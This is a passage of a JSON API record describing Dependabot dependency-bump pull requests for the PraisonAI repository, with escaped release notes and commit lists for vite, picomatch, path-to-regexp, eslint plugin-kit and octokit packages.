href=\"https://redirect.github.com/pillarjs/path-to-regexp/pull/422\"\u003epillarjs/path-to-regexp#422\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003eThis will result in shorter regular expressions for some cases using optional groups\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eRejects large optional route combinations (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/pull/424\"\u003epillarjs/path-to-regexp#424\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003eWhen using groups such as \u003ccode\u003e/users{/delete}\u003c/code\u003e it will restrict the number of generated combinations to \u0026lt; 256, equivalent to 8 top-level optional groups and unlikely to occur in a real world application, but avoids exploding the regex size for applications that accept user created routes\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.3.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eChanged\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd custom error class (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/398\"\u003e#398\u003c/a\u003e)  2a7f2a4\u003c/li\u003e\n\u003cli\u003eAllow plain objects for \u003ccode\u003eTokenData\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/391\"\u003e#391\u003c/a\u003e)  687a9bb\u003c/li\u003e\n\u003cli\u003eEscape text should escape backslash (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/390\"\u003e#390\u003c/a\u003e)  a4a8552\u003c/li\u003e\n\u003cli\u003eImproved error messages and stack size (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/363\"\u003e#363\u003c/a\u003e)  a6bdf40\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eOther\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eMinifying the parser\n\u003cul\u003e\n\u003cli\u003ePR (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/401\"\u003e#401\u003c/a\u003e)  9df2448\u003c/li\u003e\n\u003cli\u003ePR (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/395\"\u003e#395\u003c/a\u003e)  4a91505\u003c/li\u003e\n\u003cli\u003eShaving some bytes  d63f44b\u003c/li\u003e\n\u003cli\u003eRemove optional operator  973d15c\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v8.2.0...v8.3.0\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v8.2.0...v8.3.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/7f058760ae0867fdd75e5ed07d7096f782c1f752\"\u003e\u003ccode\u003e7f05876\u003c/code\u003e\u003c/a\u003e 8.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/6bc8e84677caa52de6db7b2b17a6729ec155b070\"\u003e\u003ccode\u003e6bc8e84\u003c/code\u003e\u003c/a\u003e Remove trie deduplication (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/431\"\u003e#431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/5bcd30b790fecfd4798521af28a57214996c4139\"\u003e\u003ccode\u003e5bcd30b\u003c/code\u003e\u003c/a\u003e Allow backtrack handling to match itself (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/427\"\u003e#427\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/9f9c6c501f6d015db3df224d2479475d59cac0a5\"\u003e\u003ccode\u003e9f9c6c5\u003c/code\u003e\u003c/a\u003e Add parsing to benchmarks (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/9fd31e0cde4f35b5f15f1676eabe3484618038ad\"\u003e\u003ccode\u003e9fd31e0\u003c/code\u003e\u003c/a\u003e Add \u003ccode\u003etrailing: false\u003c/code\u003e tests (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/428\"\u003e#428\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/1e796b51fd86c12cf23847523f86f7a7c7a134be\"\u003e\u003ccode\u003e1e796b5\u003c/code\u003e\u003c/a\u003e Use \u003ccode\u003eparam\u003c/code\u003e type in README (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/429\"\u003e#429\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/34cb451ddaeea4783a2fe60579ffb3e4ccfc73a7\"\u003e\u003ccode\u003e34cb451\u003c/code\u003e\u003c/a\u003e 8.4.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/22a967901afc8b2b42eefe456faa7b6773dcc415\"\u003e\u003ccode\u003e22a9679\u003c/code\u003e\u003c/a\u003e Reject large optional route combinations (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/424\"\u003e#424\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/8881a88930cf96ebaa00412a8e87cdd601bb3f3d\"\u003e\u003ccode\u003e8881a88\u003c/code\u003e\u003c/a\u003e Byte optimization (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/423\"\u003e#423\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/43669ac637fe70fad33693d145a74d98179152ce\"\u003e\u003ccode\u003e43669ac\u003c/code\u003e\u003c/a\u003e Dedupe regex prefixes (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/422\"\u003e#422\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v8.2.0...v8.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `picomatch` from 2.3.1 to 2.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/releases\"\u003epicomatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.3.2\u003c/h2\u003e\n\u003cp\u003eThis is a security release fixing several security relevant issues.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: exception when glob pattern contains constructor by \u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\"\u003eCVE-2026-33671\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\"\u003eCVE-2026-33672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ehttps://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/blob/master/CHANGELOG.md\"\u003epicomatch's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease history\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eAll notable changes to this project will be documented in this file.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"http://keepach...\n\n_Description has been truncated_","html_url":"https://github.com/MervinPraison/PraisonAI/pull/1232","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/MervinPraison%2FPraisonAI/issues/1232","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1232/packages"}},{"old_version":"9.1.5","new_version":"9.2.2","update_type":"minor","path":null,"pr_created_at":"2026-03-26T02:14:54.000Z","version_change":"9.1.5 → 9.2.2","issue":{"uuid":"4139904406","node_id":"PR_kwDOOE7T7M7NjOXa","number":27,"state":"closed","title":"Bump the npm_and_yarn group across 1 directory with 16 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-03-26T02:15:02.000Z","author_association":null,"state_reason":null,"created_at":"2026-03-26T02:14:54.000Z","updated_at":"2026-03-26T02:15:11.000Z","time_to_close":8,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":16,"packages":[{"name":"vite","old_version":"5.4.14","new_version":"5.4.21","repository_url":"https://github.com/vitejs/vite"},{"name":"@eslint/plugin-kit","old_version":"0.2.7","new_version":"0.2.8","repository_url":"https://github.com/eslint/rewrite"},{"name":"@octokit/plugin-paginate-rest","old_version":"9.1.5","new_version":"9.2.2","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@octokit/request-error","old_version":"5.0.1","new_version":"5.1.1","repository_url":"https://github.com/octokit/request-error.js"},{"name":"@octokit/request","old_version":"8.1.6","new_version":"8.4.1","repository_url":"https://github.com/octokit/request.js"},{"name":"ajv","old_version":"6.12.6","new_version":"6.14.0","repository_url":"https://github.com/ajv-validator/ajv"},{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.12","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"flatted","old_version":"3.2.9","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"glob","old_version":"10.4.5","new_version":"10.5.0","repository_url":"https://github.com/isaacs/node-glob"},{"name":"js-yaml","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"lodash","old_version":"4.17.21","new_version":"4.17.23","repository_url":"https://github.com/lodash/lodash"},{"name":"minimatch","old_version":"3.1.2","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"picomatch","old_version":"2.3.1","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"undici","old_version":"5.28.3","new_version":"5.29.0","repository_url":"https://github.com/nodejs/undici"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 14 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite) | `5.4.14` | `5.4.21` |\n| [@eslint/plugin-kit](https://github.com/eslint/rewrite/tree/HEAD/packages/plugin-kit) | `0.2.7` | `0.2.8` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `9.1.5` | `9.2.2` |\n| [@octokit/request-error](https://github.com/octokit/request-error.js) | `5.0.1` | `5.1.1` |\n| [@octokit/request](https://github.com/octokit/request.js) | `8.1.6` | `8.4.1` |\n| [ajv](https://github.com/ajv-validator/ajv) | `6.12.6` | `6.14.0` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.12` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.2.9` | `3.4.2` |\n| [glob](https://github.com/isaacs/node-glob) | `10.4.5` | `10.5.0` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [lodash](https://github.com/lodash/lodash) | `4.17.21` | `4.17.23` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.1.2` | `3.1.5` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n| [undici](https://github.com/nodejs/undici) | `5.28.3` | `5.29.0` |\n\n\nUpdates `vite` from 5.4.14 to 5.4.21\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/releases\"\u003evite's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.4.21\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/v5.4.21/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003ch2\u003ev5.4.20\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/ca88ed7398288ce0c60176ac9a6392f10654c67c/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/blob/v5.4.21/packages/vite/CHANGELOG.md\"\u003evite's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e5.4.21 (2025-10-20)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(dev): trim trailing slash before \u003ccode\u003eserver.fs.deny\u003c/code\u003e check (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20968\"\u003e#20968\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20970\"\u003e#20970\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/cad1d31d0635dd8fd4ddfe6e5a92eb9ff13cd06c\"\u003ecad1d31\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20968\"\u003e#20968\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20970\"\u003e#20970\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: update CHANGELOG (\u003ca href=\"https://github.com/vitejs/vite/commit/ca88ed7398288ce0c60176ac9a6392f10654c67c\"\u003eca88ed7\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e5.4.20 (2025-09-08)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: apply \u003ccode\u003efs.strict\u003c/code\u003e check to HTML files (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20736\"\u003e#20736\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/482000f57f56fe6ff2e905305100cfe03043ddea\"\u003e482000f\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20736\"\u003e#20736\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: port sirv@3.0.2 changes to sirv@2.0.4 (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20737\"\u003e#20737\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/4f1c35bcbb5830290c694aa14b6789e07450f069\"\u003e4f1c35b\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20737\"\u003e#20737\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e5.4.19 (2025-04-30)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19965\"\u003e#19965\u003c/a\u003e, check static serve file inside sirv (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19966\"\u003e#19966\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/766947e7cbf1cdd07df9737394e8c870401b78b0\"\u003e766947e\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19965\"\u003e#19965\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19966\"\u003e#19966\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e5.4.18 (2025-04-10)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19830\"\u003e#19830\u003c/a\u003e, reject requests with \u003ccode\u003e#\u003c/code\u003e in request-target (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19831\"\u003e#19831\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/823675baff2bd6809c74ba2d9acca0327923a54f\"\u003e823675b\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19830\"\u003e#19830\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19831\"\u003e#19831\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e5.4.17 (2025-04-03)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19782\"\u003e#19782\u003c/a\u003e, fs check with svg and relative paths (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19784\"\u003e#19784\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/84b2b46ed129be8215108e789a90adbb33a9c42c\"\u003e84b2b46\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19782\"\u003e#19782\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19784\"\u003e#19784\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e5.4.16 (2025-03-31)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19761\"\u003e#19761\u003c/a\u003e, fs check in transform middleware (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19762\"\u003e#19762\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/b627c50d359f3bd9b602408fbbf462cf4a2f019c\"\u003eb627c50\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19761\"\u003e#19761\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19762\"\u003e#19762\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e5.4.15 (2025-03-24)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19702\"\u003e#19702\u003c/a\u003e, fs raw query with query separators (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19703\"\u003e#19703\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/807d7f06d33ab49c48a2a3501da3eea1906c0d41\"\u003e807d7f0\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19702\"\u003e#19702\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19703\"\u003e#19703\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/adce3c22c64cc9d44cc8f45cc92b543e3e4bf385\"\u003e\u003ccode\u003eadce3c2\u003c/code\u003e\u003c/a\u003e release: v5.4.21\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/cad1d31d0635dd8fd4ddfe6e5a92eb9ff13cd06c\"\u003e\u003ccode\u003ecad1d31\u003c/code\u003e\u003c/a\u003e fix(dev): trim trailing slash before \u003ccode\u003eserver.fs.deny\u003c/code\u003e check (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20968\"\u003e#20968\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20970\"\u003e#20970\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/ca88ed7398288ce0c60176ac9a6392f10654c67c\"\u003e\u003ccode\u003eca88ed7\u003c/code\u003e\u003c/a\u003e chore: update CHANGELOG\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/997700f01c7199daf7330d33a7fd3a43b2e9e3ba\"\u003e\u003ccode\u003e997700f\u003c/code\u003e\u003c/a\u003e release: v5.4.20\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/482000f57f56fe6ff2e905305100cfe03043ddea\"\u003e\u003ccode\u003e482000f\u003c/code\u003e\u003c/a\u003e fix: apply \u003ccode\u003efs.strict\u003c/code\u003e check to HTML files (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20736\"\u003e#20736\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/80a333a23103ced0442d4463d1191433d90f5e19\"\u003e\u003ccode\u003e80a333a\u003c/code\u003e\u003c/a\u003e release: v5.4.19\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/766947e7cbf1cdd07df9737394e8c870401b78b0\"\u003e\u003ccode\u003e766947e\u003c/code\u003e\u003c/a\u003e fix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19965\"\u003e#19965\u003c/a\u003e, check static serve file inside sirv (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19966\"\u003e#19966\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/731b77d19d36f5682a5441b49cb2f6473389ad99\"\u003e\u003ccode\u003e731b77d\u003c/code\u003e\u003c/a\u003e release: v5.4.18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/823675baff2bd6809c74ba2d9acca0327923a54f\"\u003e\u003ccode\u003e823675b\u003c/code\u003e\u003c/a\u003e fix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19830\"\u003e#19830\u003c/a\u003e, reject requests with \u003ccode\u003e#\u003c/code\u003e in request-target (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19831\"\u003e#19831\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/0a2518a98d2354c61ee8ef51f7d00fa92aebb511\"\u003e\u003ccode\u003e0a2518a\u003c/code\u003e\u003c/a\u003e release: v5.4.17\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/vitejs/vite/commits/v5.4.21/packages/vite\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@eslint/plugin-kit` from 0.2.7 to 0.2.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/eslint/rewrite/releases\"\u003e\u003ccode\u003e@​eslint/plugin-kit\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eplugin-kit: v0.2.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/eslint/rewrite/compare/plugin-kit-v0.2.7...plugin-kit-v0.2.8\"\u003e0.2.8\u003c/a\u003e (2025-04-01)\u003c/h2\u003e\n\u003ch3\u003eDependencies\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eThe following workspace dependencies were updated\n\u003cul\u003e\n\u003cli\u003edependencies\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​eslint/core\u003c/code\u003e bumped from ^0.12.0 to ^0.13.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/eslint/rewrite/blob/main/packages/plugin-kit/CHANGELOG.md\"\u003e\u003ccode\u003e@​eslint/plugin-kit\u003c/code\u003e's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/eslint/rewrite/compare/plugin-kit-v0.2.7...plugin-kit-v0.2.8\"\u003e0.2.8\u003c/a\u003e (2025-04-01)\u003c/h2\u003e\n\u003ch3\u003eDependencies\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eThe following workspace dependencies were updated\n\u003cul\u003e\n\u003cli\u003edependencies\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​eslint/core\u003c/code\u003e bumped from ^0.12.0 to ^0.13.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eslint/rewrite/commit/1615a01d9e5c637dfb4d19bb53968185462fadb3\"\u003e\u003ccode\u003e1615a01\u003c/code\u003e\u003c/a\u003e chore: release main (\u003ca href=\"https://github.com/eslint/rewrite/tree/HEAD/packages/plugin-kit/issues/174\"\u003e#174\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eslint/rewrite/commit/6199b6e3fa80aea5df2730f75f88e462eb49cd17\"\u003e\u003ccode\u003e6199b6e\u003c/code\u003e\u003c/a\u003e docs: Update README sponsors\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eslint/rewrite/commit/1f9c609c2d5312c285b552225da249fc42ca4654\"\u003e\u003ccode\u003e1f9c609\u003c/code\u003e\u003c/a\u003e docs: Update README sponsors\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eslint/rewrite/commit/473c9629359b08818af5ee21a17bd21db5dcc478\"\u003e\u003ccode\u003e473c962\u003c/code\u003e\u003c/a\u003e docs: Update README sponsors\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eslint/rewrite/commit/a48aa6ac192f1c2d1fd9a1ed396a57919b24a25e\"\u003e\u003ccode\u003ea48aa6a\u003c/code\u003e\u003c/a\u003e docs: Update README sponsors\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eslint/rewrite/commit/49d1d2009cb3a2583e6214cd931d0e6b87cb034c\"\u003e\u003ccode\u003e49d1d20\u003c/code\u003e\u003c/a\u003e docs: Update README sponsors\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/eslint/rewrite/commits/plugin-kit-v0.2.8/packages/plugin-kit\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 9.1.5 to 9.2.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev9.2.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003e9.2.2\u003c/a\u003e 